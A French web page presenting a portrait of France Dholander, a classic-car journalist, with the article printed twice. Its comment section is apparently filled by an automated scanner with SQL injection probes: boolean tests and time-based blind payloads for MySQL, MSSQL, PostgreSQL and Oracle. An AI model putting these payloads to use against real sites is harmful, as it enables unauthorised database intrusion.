| Portrait
Partager sur :

Interview de France DHOLANDER

En cette journée Internationale des Droits de la Femme, haro sur France Dholander, une des rares journalistes du monde de l’automobile de collection.

France Dholander nous explique comment sa passion s’inscrit dans sa vie professionnelle, au point de devenir un art de vivre au quotidien. Journaliste-rédactrice spécialisée, elle propose aussi ses services dans le domaine de l’événementiel (Traversée d’Alès, au concours d’Elégance de Saint-Jean-Cap Ferrat), et à toute projet visant à promouvoir l’Automobile Ancienne.

France nous apprend que c’est un certain Igor Bietry qui l’a définitivement initiée à l’univers de l’automobile ancienne, en l’entraînant au Vintage Revival Montlhéry, une manifestation rare où n’ont droit de circuler que des engins d’avant-guerre ! L’ambiance et le sens du partage régnants dont elle témoigne encore avec émotion, fut comme une révélation, et a « redonné un sens à sa passion pour l’automobile », mais pas n’importe quelles autos, celles qui témoignent de l’Histoire avec un grand H.

Sa propre tradition familiale singulière, car entièrement féminine, se fait l’écho de cette passion pour l’auto ancienne, puisque c’est 4 générations de femmes qui sont vectrices de cette passion.  

France concrétise sa passion avec l’acquisition d’une FORD 40-V8, modèle construit après le crash de 1929 par Henri Ford avec l’ambition de proposer une voiture puissante, accessible et qui fasse rêver.

Classic Expert qui compte aussi des femmes collectionneuses dans ses rangs, lui souhaite une bonne continuation dans cette voie !

ITW DE France DHOLANDER

En cette journée Internationale des Droits de la Femme, haro sur France Dholander, une des rares journalistes du monde de l’automobile de collection.

France Dholander nous explique comment sa passion s’inscrit dans sa vie professionnelle, au point de devenir un art de vivre au quotidien. Journaliste-rédactrice spécialisée, elle propose aussi ses services dans le domaine de l’événementiel (Traversée d’Alès, au concours d’Elégance de Saint-Jean-Cap Ferrat), et à toute projet visant à promouvoir l’Automobile Ancienne.

France nous apprend que c’est un certain Igor Bietry qui l’a définitivement initiée à l’univers de l’automobile ancienne, en l’entraînant au Vintage Revival Montlhéry, une manifestation rare où n’ont droit de circuler que des engins d’avant-guerre ! L’ambiance et le sens du partage régnants dont elle témoigne encore avec émotion, fut comme une révélation, et a « redonné un sens à sa passion pour l’automobile », mais pas n’importe quelles autos, celles qui témoignent de l’Histoire avec un grand H.

Sa propre tradition familiale singulière, car entièrement féminine, se fait l’écho de cette passion pour l’auto ancienne, puisque c’est 4 générations de femmes qui sont vectrices de cette passion.  

France concrétise sa passion avec l’acquisition d’une FORD 40-V8, modèle construit après le crash de 1929 par Henri Ford avec l’ambition de proposer une voiture puissante, accessible et qui fasse rêver.

 

voiture FORD 40-V8

Classic Expert qui compte aussi des femmes collectionneuses dans ses rangs, lui souhaite une bonne continuation dans cette voie !

Commentaires

  1. 1

    555

  2. 1

    555

  3. 1

    555

  4. xpJMxqzr

    555

  5. -1 OR 2+813-813-1=0+0+0+1 --

    555

  6. -1 OR 2+906-906-1=0+0+0+1

    555

  7. -1' OR 2+544-544-1=0+0+0+1 --

    555

  8. -1' OR 2+743-743-1=0+0+0+1 or 'IqnfG8Uj'='

    555

  9. -1" OR 2+149-149-1=0+0+0+1 --

    555

  10. if(now()=sysdate(),sleep(15),0)

    555

  11. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

    555

  12. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

    555

  13. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

    555

  14. -1; waitfor delay '0:0:15' --

    555

  15. -1); waitfor delay '0:0:15' --

    555

  16. 1 waitfor delay '0:0:15' --

    555

  17. NNI7arxj'; waitfor delay '0:0:15' --

    555

  18. -5 OR 484=(SELECT 484 FROM PG_SLEEP(15))--

    555

  19. -5) OR 944=(SELECT 944 FROM PG_SLEEP(15))--

    555

  20. -1)) OR 25=(SELECT 25 FROM PG_SLEEP(15))--

    555

  21. Z98LVjM8' OR 808=(SELECT 808 FROM PG_SLEEP(15))--

    555

  22. IM2BeIJL') OR 658=(SELECT 658 FROM PG_SLEEP(15))--

    555

  23. eenHpdUi')) OR 584=(SELECT 584 FROM PG_SLEEP(15))--

    555

  24. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

    555

  25. 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

    555

  26. 1'"

    555

  27. @@FANC5

    555

  28. 1

    555

  29. 1

    555

  30. 1

    QosDujoW

  31. 1

    -1 OR 2+435-435-1=0+0+0+1 --

  32. 1

    -1 OR 2+986-986-1=0+0+0+1

  33. 1

    -1' OR 2+239-239-1=0+0+0+1 --

  34. 1

    -1' OR 2+201-201-1=0+0+0+1 or '2z7gtMB9'='

  35. 1

    -1" OR 2+758-758-1=0+0+0+1 --

  36. 1

    if(now()=sysdate(),sleep(15),0)

  37. 1

    0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  38. 1

    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  39. 1

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  40. 1

    -1; waitfor delay '0:0:15' --

  41. 1

    -1); waitfor delay '0:0:15' --

  42. 1

    1 waitfor delay '0:0:15' --

  43. 1

    ajLuTUrT'; waitfor delay '0:0:15' --

  44. 1

    -5 OR 26=(SELECT 26 FROM PG_SLEEP(15))--

  45. 1

    -5) OR 796=(SELECT 796 FROM PG_SLEEP(15))--

  46. 1

    -1)) OR 12=(SELECT 12 FROM PG_SLEEP(15))--

  47. 1

    a3tY8Gxm' OR 803=(SELECT 803 FROM PG_SLEEP(15))--

  48. 1

    F9IY3V37') OR 615=(SELECT 615 FROM PG_SLEEP(15))--

  49. 1

    UHMR0pbY')) OR 906=(SELECT 906 FROM PG_SLEEP(15))--

  50. 1

    555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  51. 1

    555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  52. 1

    1'"

  53. 1

    @@ONufV

  54. 1

    555

  55. 1

    555

  56. 1

    555

  57. 1

    555

  58. 1

    555

  59. 1

    555

  60. 1

    555

  61. 1

    555

  62. 1

    555

  63. 1

    555

  64. 1

    555

  65. 1

    555

  66. 1

    555

  67. 1

    555

  68. 1

    555

  69. 1

    555

  70. 1

    555

  71. 1

    555

  72. 1

    555

  73. 1

    555

  74. 1

    555

  75. 1

    555

  76. 1

    555

  77. 1

    555

  78. 1

    555

  79. 1

    555

  80. 1

    555

  81. 1

    555

  82. 1

    555

  83. 1

    555

  84. 1

    555

  85. 1

    555

  86. 1

    555

  87. 1

    555

  88. 1

    555

  89. 1

    555

  90. 1

    555

  91. 1

    555

  92. 1

    555

  93. 1

    555

  94. 1

    555

  95. 1

    555

  96. 1

    555

  97. 1

    555

N'hésitez pas à nous laisser un commentaire !

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *